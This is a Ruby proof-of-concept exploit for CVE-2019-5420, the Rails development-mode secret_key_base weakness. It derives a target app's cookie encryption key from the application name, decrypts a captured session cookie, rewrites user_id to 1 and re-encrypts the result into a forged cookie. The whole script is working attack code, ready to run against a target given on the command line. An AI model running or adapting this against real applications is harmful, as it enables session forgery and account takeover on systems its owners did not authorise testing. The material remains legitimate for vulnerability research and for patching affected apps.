# frozen_string_literal: true
## CVE-2019-5420: Rails development-mode secret_key_base recovery and encrypted cookie forgery.
## Credit to the researchers who push security research into unexplored territory.
## CVE discovered by: ooooooo_q @ hackerone
require 'base64'
require 'digest'
require 'json'
require 'openssl'
require 'uri'
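## Target-specific inputs. Either edit the two placeholders or pass them on the
## command line:  ruby CVE-2019-5420.rb <app name> <cookie value>
## The cookie has to come from a Rails app running in *development* mode: the
## affected versions derive secret_key_base from the application class name
## there, which is what makes the cookie key recoverable below. (The original
## author reports it does not work against test or deployed apps.)
## If you don't know the app name, enumerate it.
APP_NAME_PLACEHOLDER = "<insert app name>"
COOKIE_PLACEHOLDER = "<y'all cookie from the development rails app goes here>"

# Percent-decodes +str+ the way URI.decode (removed in Ruby 3.0) did: only %XX
# escapes are touched. A form decoder would also turn '+' into a space and
# corrupt the base64 ciphertext, which is why this is hand-rolled.
#
# @param str [String] percent-encoded cookie value
# @return [String] decoded value, in +str+'s encoding
def percent_decode(str)
  str.gsub(/%([0-9a-fA-F]{2})/) do
    [Regexp.last_match(1)].pack("H2").force_encoding(str.encoding)
  end
end

# Percent-encodes the three base64 characters that are not cookie-safe, which
# is exactly what URI.escape(blob, "=/+") (removed in Ruby 3.0) did.
#
# @param blob [String] base64 cookie blob
# @return [String] blob with '=', '/' and '+' replaced by %3D, %2F and %2B
def cookie_escape(blob)
  blob.gsub(%r{[=/+]}) { |c| format("%%%02X", c.ord) }
end

# Recovers the cookie encryption key an affected Rails app uses in development.
#
# Affected versions set secret_key_base = MD5("<AppName>::Application") when
# running in development, and the cookie key is then derived from it with
# ActiveSupport::KeyGenerator: PBKDF2-HMAC-SHA1, 1000 iterations, the
# "authenticated encrypted cookie" salt, 32 bytes for aes-256-gcm.
#
# @param app_name [String] the application's module name (the `Blog` in `Blog::Application`)
# @param salt [String] the app's authenticated_encrypted_cookie_salt (Rails default given)
# @param iterations [Integer] KeyGenerator iterations (Rails default given)
# @param length [Integer] key size in bytes (32 for aes-256-gcm)
# @return [String] the raw key bytes
def secret(app_name = APP_NAME_PLACEHOLDER, salt: "authenticated encrypted cookie", iterations: 1000, length: 32)
  secret_key_base = Digest::MD5.hexdigest("#{app_name}::Application")
  OpenSSL::KDF.pbkdf2_hmac(secret_key_base, salt: salt, iterations: iterations, length: length, hash: "sha1")
end

# Decrypts one aes-256-gcm encrypted cookie of the form
# base64(ciphertext)--base64(iv)--base64(auth_tag) and returns the plaintext.
#
# @param cookie [String] the cookie value, already percent-decoded
# @param key [String] 32-byte key, see #secret
# @return [String] the serialized session payload
# @raise [ArgumentError] if the blob does not have three parts, is not strict
#   base64, or the auth tag is not 16 bytes
# @raise [OpenSSL::Cipher::CipherError] if the tag does not verify (wrong key)
def decrypt_cookie(cookie, key)
  parts = cookie.split("--").map { |part| Base64.strict_decode64(part) }
  raise ArgumentError, "expected ciphertext--iv--auth_tag, got #{parts.length} part(s)" unless parts.length == 3

  ciphertext, iv, auth_tag = parts
  # GCM silently accepts truncated tags; insist on the full 16 bytes so a
  # malformed cookie fails loudly instead of "verifying" with a short tag.
  raise ArgumentError, "auth tag must be 16 bytes, got #{auth_tag.bytesize}" unless auth_tag.bytesize == 16

  cipher = OpenSSL::Cipher.new("aes-256-gcm")
  cipher.decrypt
  cipher.key = key
  cipher.iv = iv
  cipher.auth_tag = auth_tag
  cipher.auth_data = "" # no additional authenticated data is used
  cipher.update(ciphertext) + cipher.final
end

# Encrypts +payload+ into the same aes-256-gcm cookie format that #decrypt_cookie reads.
#
# @param payload [String] serialized session payload (must not be empty)
# @param key [String] 32-byte key, see #secret
# @return [String] base64(ciphertext)--base64(iv)--base64(auth_tag), not yet percent-encoded
def encrypt_cookie(payload, key)
  cipher = OpenSSL::Cipher.new("aes-256-gcm")
  cipher.encrypt
  cipher.key = key
  iv = cipher.random_iv # fresh nonce per forgery; never reuse a nonce with this key
  cipher.auth_data = ""
  ciphertext = cipher.update(payload) + cipher.final
  [ciphertext, iv, cipher.auth_tag].map { |part| Base64.strict_encode64(part) }.join("--")
end

app_name = ARGV.fetch(0, APP_NAME_PLACEHOLDER)
cookie = ARGV.fetch(1, COOKIE_PLACEHOLDER)

if app_name == APP_NAME_PLACEHOLDER || cookie == COOKIE_PLACEHOLDER
  # Warn rather than abort so the helpers above can be loaded (e.g. from irb) without side effects.
  warn "usage: ruby #{$PROGRAM_NAME} <app name> <cookie value>   (or edit the placeholders in this file)"
else
  key = secret(app_name)
  begin
    plaintext = decrypt_cookie(percent_decode(cookie), key)
  rescue OpenSSL::Cipher::CipherError
    abort "auth tag did not verify: wrong app name, cookie not from development mode, or target not affected"
  end
  puts plaintext
  # This handles the JSON cookie serializer only. If the plaintext turns out to be
  # a {"_rails": {...}} wrapper rather than the session hash itself, or the app
  # uses the hybrid/Marshal serializer, the (de)serialization step differs and is
  # not covered here.
  session = JSON.parse(plaintext)
  session["user_id"] = 1
  forged = JSON.generate(session)
  puts forged
  puts cookie_escape(encrypt_cookie(forged, key))
end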